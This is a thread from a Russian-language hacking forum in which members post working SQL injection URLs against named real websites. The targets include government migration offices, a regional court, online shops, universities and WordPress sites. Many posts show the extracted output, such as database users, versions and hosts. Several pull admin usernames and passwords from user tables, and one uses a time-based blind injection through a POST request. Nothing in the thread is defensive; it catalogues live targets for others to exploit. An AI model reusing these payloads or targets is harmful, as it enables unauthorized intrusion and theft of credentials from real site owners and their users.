SQL Инъекции

Discussion in 'Уязвимости' started by m0nzt3r, 4 Jul 2006.

Thread Status:
Not open for further replies.
  1. Win32BOT

    Win32BOT Member

    Joined:
    4 Mar 2013
    Messages:
    64
    Likes Received:
    10
    Reputations:
    -3
    Code:
    http://ecom-info.spb.ru/news/index.php?id=-757+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,concat_ws(user(),version(),database()),16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35+--+
    ТИЦ 600
    PR 4


    ==============================

    Code:
    http://villa-beliv.com/room.php?id=-4+union+select+1,2,3,4,version(),6,user(),8,9,database()+--+
    =============================

    Code:
    http://vladdepo.ru/buy.php?id=-47+union+select+1,2,concat_ws(0x3a,version(),database(),user()),4,5,6,7,8,9,10,11+--+&make=show
     
    #15761 Win32BOT, 26 Feb 2014
    Last edited: 26 Feb 2014
    1 person likes this.
  2. psihoz26

    psihoz26 Members of Antichat

    Joined:
    22 Nov 2010
    Messages:
    546
    Likes Received:
    159
    Reputations:
    324
    Магазин UltraPrice. Компьютеры, комплектующие, ноутбуки, цифровая техника, акустические системы для домашнего кинотеатра. Минск.

    Code:
    http://www.ultraprice.by/popups/service.php?id=-10+union+select+group_concat(u_name,0x3b,u_passwd)+from+admin_user+limit+0,1+--+
     
  3. MaxFast

    MaxFast Elder - Старейшина

    Joined:
    12 Oct 2011
    Messages:
    580
    Likes Received:
    148
    Reputations:
    94
    [​IMG]

    Code:
    http://www.gorod312.ru/press/news/?mode=show&id=-415+union+select+1,2,concat(version(),database(),user()),4,5,6,7,8,9,10,11--
    5.0.96-loggorod312_rugorod312_ru@zvm30.host.ru
     
    1 person likes this.
  4. MaxFast

    MaxFast Elder - Старейшина

    Joined:
    12 Oct 2011
    Messages:
    580
    Likes Received:
    148
    Reputations:
    94
    [​IMG]

    Code:
    http://novufms.ru/content.php?id=-14+union+select+1,concat(user(),0x3a,version()),3,4--
    novufms@localhost:5.0.51a-24+lenny5

    Code:
    http://www.mvpvo.ru/inner.php?id=-1+union+select+1,2,concat(user(),0x3a,version()),4,5,6,7,8,9,10,11,12--
    u67093@10.8.1.199:5.0.95-log
     
    #15764 MaxFast, 5 Mar 2014
    Last edited: 5 Mar 2014
    2 people like this.
  5. MaxFast

    MaxFast Elder - Старейшина

    Joined:
    12 Oct 2011
    Messages:
    580
    Likes Received:
    148
    Reputations:
    94
    [​IMG]

    Code:
    http://www.chel-oblsud.ru/?html=news&nid=-1328+/*!+and(select+1+from(select+count(*),concat((select+(select+concat(version(),0x3a,user()))+from+information_schema.tables+limit+0,1),floor(rand(0)*2))x+from information_schema.tables+group+by+x)a)*/
    5.0.95-log:chel-oblsud@localhost1
     
  6. GhostW

    GhostW Member

    Joined:
    17 Oct 2012
    Messages:
    207
    Likes Received:
    46
    Reputations:
    33
    Code:
    http://www.zuppatheatre.com/members.php?id=-1+union+select+1,2,3,4,concat_ws(0x3a,version(),user(),database()),6,7,8,9--
     
  7. MaxFast

    MaxFast Elder - Старейшина

    Joined:
    12 Oct 2011
    Messages:
    580
    Likes Received:
    148
    Reputations:
    94
    [​IMG]

    Code:
    http://www.ufmsko.ru/view.php?id=-1+union+select+1,2,concat(user(),0x3a,version()),4,5,6,7--
    root@localhost:5.0.45

    [​IMG]
    Code:
    http://www.ufms72.ru/index.php?catalog=-79'+union+select+1,2,3,concat(version(),0x3a,user()),5,6,7,8,9,10+--+
    5.1.46-log:gb_ufms72@81.177.33.6
     
    #15767 MaxFast, 9 Mar 2014
    Last edited: 9 Mar 2014
  8. AHTNkiller

    AHTNkiller New Member

    Joined:
    7 Sep 2011
    Messages:
    20
    Likes Received:
    1
    Reputations:
    0
    Помогите доковырять!
    http://avtochast. ru/cardescr.php?carid=874&mod=&typeid=-9563+union+select+1,version%28%29,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53
     
  9. YaBtr

    YaBtr Members of Antichat

    Joined:
    30 May 2012
    Messages:
    601
    Likes Received:
    350
    Reputations:
    652
    есть специальная тема https://forum.antichat.ru/thread46016.html
     
  10. Win32BOT

    Win32BOT Member

    Joined:
    4 Mar 2013
    Messages:
    64
    Likes Received:
    10
    Reputations:
    -3
    HTML:
    kompromat.flb.ru/material1.phtml?id=-153+union+select+1,concat(version(),0x3a,user()),3,4,5,6,7,8,9,10,11+--+
    file_priv = Y

    ТИЦ (kompromat.flb.ru) 425
    ТИЦ (flb.ru) 2700
     
  11. danil7493

    danil7493 Member

    Joined:
    24 Jul 2011
    Messages:
    23
    Likes Received:
    7
    Reputations:
    10
    http://www.mhfan.fr/news.php?id=-5+union+select+1,2,3,group_concat(concat_ws(0x3a3a,pseudo_user,mail_user,mdp_user)),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25+from+users+limit+0,20--
     
  12. danil7493

    danil7493 Member

    Joined:
    24 Jul 2011
    Messages:
    23
    Likes Received:
    7
    Reputations:
    10
    http://www.autosystem.com.ua/news.php?id=-7+union+select+1,2,3,concat_ws(0x3a3a3a3a,user(),database(),version()),5,6,7,8+--+

    autosystem@web5.1.hosting.efort.com.ua::::autosystem_nissan::::5.1.68-log
     
  13. psihoz26

    psihoz26 Members of Antichat

    Joined:
    22 Nov 2010
    Messages:
    546
    Likes Received:
    159
    Reputations:
    324
    proskater.ru - Самый крупный в Раисие интернет скейтшоп.
    ТИЦ 275
    PR 3

    Code:
    [B]POST[/B] http://www.proskater.ru/shopping_cart.php?action=update_product
    [B]DATA[/B] products_id[]=1029188{1}539'+benchmark(20000000,sha1(1))+'&cart_delete[]=1029188{1}539
    Code:
    Host IP:	89.108.91.9
    Web Server: 	nginx/0.7.65
    Powered-by: 	PHP/5.3.2-1ubuntu4.17
    Current DB: 	db_proskater
    Чтобы крутить надо быть залогиненым.
     
    1 person likes this.
  14. Unknowhacker

    Unknowhacker Member

    Joined:
    25 May 2013
    Messages:
    254
    Likes Received:
    35
    Reputations:
    24
    Журнал "Родина"
    Code:
    http://www.istrodina.com/rodina_articul.php3?id=3014&n=142+union+select+1,2,version%28%29+--+ 
    Версия: 4.0.27-log
     
  15. GhostW

    GhostW Member

    Joined:
    17 Oct 2012
    Messages:
    207
    Likes Received:
    46
    Reputations:
    33
    Arthur C Clarke Institute for Modern Technologies, Katubedda, Moratuwa

    Code:
    http://www.accimt.ac.lk/news_details.php?id=-13+union+select+1,concat_ws(0x3a,version(),user(),database()),3,4,5,6,7,8,9,10,11,12--
     
  16. MaxFast

    MaxFast Elder - Старейшина

    Joined:
    12 Oct 2011
    Messages:
    580
    Likes Received:
    148
    Reputations:
    94
    Code:
    http://www.right2lifelanka.org/new/newsview.php?id=-138'+union+select+1,2,concat(user(),database()),4,5,6,7,8+--+
    r2llanka_user@localhostr2llanka_main

    Code:
    http://legacyera.com/wp-content/plugins/formcraft/form.php?id=1+union+all+select+1,2,3,concat(user(),0x3a,database()),5,6,7,8,9,10,11--
    legacy_jordan@localhost:legacy_wp

    Code:
    http://www.southcrest.org/wp-content/plugins/formcraft/form.php?id=1+union+all+select+1,2,3,concat(user(),0x3a,database()),5,6,7,8,9,10,11--
    southcrestorg@joro.dreamhost.com:southcrest_org
     
    #15776 MaxFast, 26 Mar 2014
    Last edited: 26 Mar 2014
  17. GhostW

    GhostW Member

    Joined:
    17 Oct 2012
    Messages:
    207
    Likes Received:
    46
    Reputations:
    33
    ФК Локомотив Ташкент

    Code:
    http://lokomotiv.uz/news.php?id=-794+union+select+@@version,2,3,4,5,6,7,8,9,10,11,1  2,13,14,15,16,17,18,19,20,21,22--
    
     
    1 person likes this.
  18. e17

    e17 Member

    Joined:
    8 Feb 2013
    Messages:
    47
    Likes Received:
    56
    Reputations:
    81
    Не нашел названия скрипта партнерки и сайт производителя, но на иденичном коде есть крупные проекты:

    скрипт: work-task-read.php

    переменная:?adv=

    запрос:

    Code:
    -158%27 union select 1,2,concat_ws%280x3a,id,username,password%29,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23 from tb_users+limit+1,1+--+
     
    Зависимость: аккаунт в системе.

    Живой пример:

    _ttp://mvdbux.ru/work-task-read.php?adv=
    -158%27%20union%20select%201,2,concat_ws%280x3a,id,username,password%29,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23%20from%20tb_users+limit+0,1+--+
     
    #15778 e17, 6 Apr 2014
    Last edited: 6 Apr 2014
  19. GhostW

    GhostW Member

    Joined:
    17 Oct 2012
    Messages:
    207
    Likes Received:
    46
    Reputations:
    33
    Code:
    http://www.accimt.ac.lk/news_details.php?id=-13+union+select+1,concat_ws(0x3a,version(),user(),database()),3,4,5,6,7,8,9,10,11,12--
    
     
  20. YaBtr

    YaBtr Members of Antichat

    Joined:
    30 May 2012
    Messages:
    601
    Likes Received:
    350
    Reputations:
    652
    Может кому интересно будет, тут присутствует еще одна уязвимость - отраженная XSS:
     
Loading...
Thread Status:
Not open for further replies.